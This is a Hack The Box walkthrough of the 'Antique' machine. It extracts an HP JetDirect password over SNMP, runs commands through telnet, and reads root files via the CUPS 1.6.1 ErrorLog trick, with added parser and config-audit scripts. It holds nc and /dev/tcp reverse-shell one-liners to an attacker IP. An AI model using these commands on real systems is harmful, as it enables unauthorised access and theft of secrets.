### Enumeration:
```
┌──(tahaafarooq㉿kali)-[~/Desktop/hackthebox/machines/easy/antique]
└─$ nmap -A 10.10.11.107 -oN nmap-scan -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-26 08:34 EDT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.10.11.107
Host is up (0.28s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
23/tcp open telnet?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270:
| JetDirect
| Password:
| NULL:
|_ JetDirect
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port23-TCP:V=7.91%I=7%D=10/26%Time=6177F62F%P=x86_64-pc-linux-gnu%r(NUL
SF:L,F,"\nHP\x20JetDirect\n\n")%r(GenericLines,19,"\nHP\x20JetDirect\n\nPa
SF:ssword:\x20")%r(tn3270,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(GetRe
SF:quest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(HTTPOptions,19,"\nHP\x
SF:20JetDirect\n\nPassword:\x20")%r(RTSPRequest,19,"\nHP\x20JetDirect\n\nP
SF:assword:\x20")%r(RPCCheck,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DN
SF:SVersionBindReqTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSStatus
SF:RequestTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Help,19,"\nHP\x20
SF:JetDirect\n\nPassword:\x20")%r(SSLSessionReq,19,"\nHP\x20JetDirect\n\nP
SF:assword:\x20")%r(TerminalServerCookie,19,"\nHP\x20JetDirect\n\nPassword
SF::\x20")%r(TLSSessionReq,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Kerb
SF:eros,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(SMBProgNeg,19,"\nHP\x20
SF:JetDirect\n\nPassword:\x20")%r(X11Probe,19,"\nHP\x20JetDirect\n\nPasswo
SF:rd:\x20")%r(FourOhFourRequest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%
SF:r(LPDString,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPSearchReq,19
SF:,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPBindReq,19,"\nHP\x20JetDir
SF:ect\n\nPassword:\x20")%r(SIPOptions,19,"\nHP\x20JetDirect\n\nPassword:\
SF:x20")%r(LANDesk-RC,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(TerminalS
SF:erver,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(NCP,19,"\nHP\x20JetDir
SF:ect\n\nPassword:\x20")%r(NotesRPC,19,"\nHP\x20JetDirect\n\nPassword:\x2
SF:0")%r(JavaRMI,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(WMSRequest,19,
SF:"\nHP\x20JetDirect\n\nPassword:\x20")%r(oracle-tns,19,"\nHP\x20JetDirec
SF:t\n\nPassword:\x20")%r(ms-sql-s,19,"\nHP\x20JetDirect\n\nPassword:\x20"
SF:)%r(afp,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(giop,19,"\nHP\x20Jet
SF:Direct\n\nPassword:\x20");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 227.79 seconds
```
First thing, I hit the box with nmap and found a telnet service running. Let's try logging into it and see what happens:
```
┌──(tahaafarooq㉿kali)-[~/Desktop/hackthebox/machines/easy/antique]
└─$ telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.
HP JetDirect
Password: whoami
Invalid password
Connection closed by foreign host.
```
Alright, it asks for a password, and the password goes over the wire in clear text!
I then scanned the IP for open UDP ports with `sudo nmap -sU -T4 10.10.11.107 -Pn` and found the SNMP port reported as open but filtered. I googled how to get the JetDirect password from SNMP and found the answer on [exploit-DB](https://www.exploit-db.com/exploits/22319). With the following command I got the password, but in hex; converting the hex characters gives the plaintext password:
```
┌──(tahaafarooq㉿kali)-[~/Desktop/hackthebox/machines/easy/antique]
└─$ snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135
```
```
┌──(tahaafarooq㉿kali)-[~/Desktop/hackthebox/machines/easy/antique]
└─$ echo "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135 " | xxd -r -p
P@ssw0rd@123!!123�q��"2Rbs3CSs��$4�Eu�WGW�(8i IY�aA�"1&1A5
```
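The garbage after the password above comes from the way net-snmp prints a `BITS` value: the raw octets in hex, followed by the positions of every set bit (1 3 9 17 ...). `xxd -r -p` swallows all hex digits it sees, so it decodes that bit-position list too. Below is an added parser (not from the writeup) that separates the octets from the bit positions by checking that the trailing numbers really are the bits set in the leading octets; the `snmpget` output is a constructed copy of the one shown above.

```python
import re

# Constructed copy of the two-line snmpget output shown in the writeup.
SNMP_OUTPUT = (
    "iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32\n"
    "33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 "
    "79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135"
)

def set_bit_positions(octets):
    """SNMP BITS numbering: bit 0 is the most significant bit of the first octet."""
    return [i * 8 + b for i, o in enumerate(octets) for b in range(8) if o & (0x80 >> b)]

def decode_snmp_bits(output):
    """Return the raw octets of a net-snmp 'BITS:' value.

    net-snmp prints two-digit hex octets and then the decimal positions of the
    set bits. A token like '33' could be either, so try every split point and
    keep the one where the trailing numbers match the bits the octets set."""
    m = re.search(r"=\s*BITS:\s*(.*)", output, re.S)
    if not m:
        raise ValueError("not a BITS value")
    tokens = m.group(1).split()
    for k in range(1, len(tokens) + 1):
        head = tokens[:k]
        if not all(re.fullmatch(r"[0-9A-Fa-f]{2}", t) for t in head):
            break                       # no longer a plausible octet list
        octets = bytes.fromhex("".join(head))
        try:
            tail = [int(t) for t in tokens[k:]]
        except ValueError:
            continue                    # a hex-only token cannot be a bit position
        if tail == set_bit_positions(octets):
            return octets
    raise ValueError("could not separate octets from bit positions")

def jetdirect_password_from_snmp(output):
    """The octets of this OID are the admin password as ASCII text."""
    return decode_snmp_bits(output).decode("ascii")

if __name__ == "__main__":
    print(jetdirect_password_from_snmp(SNMP_OUTPUT))
```

The same split would work for any `BITS` value net-snmp prints, not only this OID.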
So the password is: `P@ssw0rd@123!!123`!
### Gaining Access
Now then I just gain access:
```
┌──(tahaafarooq㉿kali)-[~/Desktop/hackthebox/machines/easy/antique]
└─$ telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.
HP JetDirect
Password: P@ssw0rd@123!!123
Please type "?" for HELP
>
```
```
> ?
To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>
Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)
addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)
exec: execute system commands (exec id)
exit: quit from telnet session
```
Since it allows command execution, I just grab the user flag first lol :)
```
> exec ls -la
total 16
drwxr-xr-x 2 lp lp 4096 Sep 27 07:12 .
drwxr-xr-x 6 root root 4096 May 14 10:52 ..
lrwxrwxrwx 1 lp lp 9 May 14 11:03 .bash_history -> /dev/null
-rwxr-xr-x 1 lp lp 1959 Sep 27 07:12 telnet.py
-rwxrwxrwx 1 lp lp 33 Oct 26 12:37 user.txt
> exec cat user.txt
fe785308269fe780ec88b269e39fb0f0
```
and then I grab myself a shell:
```bash
> exec rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 1234 >/tmp/f
```
### Elevating Privileges
While studying the machine and trying to escalate, I discovered an internal port open, 631, using `netstat -ant`. I forwarded it with socat and realized it's CUPS 1.6.1, which has a metasploit post module:
```
$ socat tcp-listen:9090,fork tcp:127.0.0.1:631 &
$ curl --request GET http://127.0.0.1:631/
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3792 100 3792 0 0 1851k 0 --:--:-- --:--:-- --:--:-- 1851k
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<TITLE>Home - CUPS 1.6.1</TITLE>
<LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
<LINK REL="SHORTCUT ICON" HREF="/images/cups-icon.png" TYPE="image/png">
</HEAD>
```
I now start `msfconsole` and push the following commands:
```
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/shell/reverse_tcp
PAYLOAD => linux/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.6:1337
```
And now we have a listener, so from the shell I already have I send a reverse shell connection to this listener and then use the post module to elevate my privs!
-> shell I have:
```
$ bash -c "bash -i &>/dev/tcp/10.10.14.6/1337 <&1"
```
-> metasploit listener I set:
```
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.6:1337
[*] Sending stage (38 bytes) to 10.10.11.107
[*] Command shell session 1 opened (10.10.14.6:1337 -> 10.10.11.107:34344) at 2021-10-26 09:31:35 -0400
lp@antique:~$
```
and there I have a session. I now press Ctrl+Z to background the session so I can load the post module against it to elevate privs:
```
msf6 exploit(multi/handler) > use multi/escalate/cups_root_file_read
msf6 post(multi/escalate/cups_root_file_read) > set session 1
session => 1
msf6 post(multi/escalate/cups_root_file_read) > show options
Module options (post/multi/escalate/cups_root_file_read):
Name Current Setting Required Description
---- --------------- -------- -----------
ERROR_LOG /var/log/cups/error_log yes The original path to the CUPS error log
FILE /etc/shadow yes The file to steal.
SESSION 1 yes The session to run this module on.
msf6 post(multi/escalate/cups_root_file_read) > set FILE /root/root.txt
FILE => /root/root.txt
```
I set the file that I want to read and now I just run it up:
```
msf6 post(multi/escalate/cups_root_file_read) > run
[!] SESSION may not be compatible with this module (incompatible session type: shell)
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] Found CUPS 1.6.1
[+] File /root/root.txt (0 bytes) saved to /home/tahaafarooq/.msf4/loot/20211026094201_default_10.10.11.107_cups_file_read_512377.txt
[*] Cleaning up...
[*] Post module execution completed
```
Alright, that's very weird: it's not giving out what it's supposed to :( Now I can't get the root flag :(( WAIT A MINUTE, I'll just exploit it manually!
Since we know the vulnerability affecting this version lets us read files, we just have to use `cupsctl` to point a log at the file we want, then read the log. Enough talk, let's get to the good part:
```
msf6 post(multi/escalate/cups_root_file_read) > sessions 1
[*] Starting interaction with 1...
lp@antique:~$ id
id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
lp@antique:~$ cupsctl ErrorLog="/root/root.txt"
cupsctl ErrorLog="/root/root.txt"
lp@antique:~$ curl http://127.0.0.1:631/admin/log/error_log?
curl http://127.0.0.1:631/admin/log/error_log?
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 33 100 33 0 0 33000 0 --:--:-- --:--:-- --:--:-- 33000
b7ac8e0efb5c4945ab73981a6f860b75
```
And there we go, we have the flag :))
So first I pointed `ErrorLog` at the file, and since I had port-forwarded the CUPS admin panel I already knew the URL that serves the logs. To set `ErrorLog` to the file I used this command:
```bash
cupsctl ErrorLog="/root/root.txt"
```
Then I used curl to print out the error log. Since the error log now reads from the file I set, that's my way in, DONE!
```
lp@antique:~$ curl http://127.0.0.1:631/admin/log/error_log?
```
and boom, we have the flag!
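From the defender's side, `cupsctl` persists that directive into `cupsd.conf`, so the trick leaves a visible trace: a log path that points outside the CUPS log directory. As an added example (not part of the writeup), a small audit of the log directives in a constructed `cupsd.conf` excerpt; the allowed directory and the `syslog`/`stderr` special values are assumptions based on the stock CUPS configuration.

```python
import posixpath

# Directives cupsd writes to as root and serves back under /admin/log/.
LOG_DIRECTIVES = {"ErrorLog", "AccessLog", "PageLog"}
ALLOWED_LOG_DIR = "/var/log/cups"        # assumed stock location
ALLOWED_SPECIAL = {"syslog", "stderr"}    # non-file values cupsd accepts

# Constructed cupsd.conf excerpt: normal lines plus the ErrorLog line that
# `cupsctl ErrorLog="/root/root.txt"` would have written.
SAMPLE_CUPSD_CONF = """\
LogLevel warn
AccessLog /var/log/cups/access_log
PageLog syslog
ErrorLog /root/root.txt
Listen localhost:631
"""

def audit_cups_log_directives(conf_text):
    """Return (directive, value, reason) for every log directive whose target
    is not a file inside ALLOWED_LOG_DIR."""
    findings = []
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) != 2 or parts[0] not in LOG_DIRECTIVES:
            continue
        directive, value = parts[0], parts[1].strip().strip('"')
        if value in ALLOWED_SPECIAL:
            continue
        # cupsd resolves a relative log path against ServerRoot, not the log
        # directory, so a relative value is suspicious as well.
        if not value.startswith("/"):
            findings.append((directive, value, "relative path"))
            continue
        norm = posixpath.normpath(value)          # collapses /var/log/cups/../..
        if posixpath.commonpath([norm, ALLOWED_LOG_DIR]) != ALLOWED_LOG_DIR:
            findings.append((directive, value, "outside " + ALLOWED_LOG_DIR))
    return findings

if __name__ == "__main__":
    for finding in audit_cups_log_directives(SAMPLE_CUPSD_CONF):
        print("suspicious log directive:", finding)
```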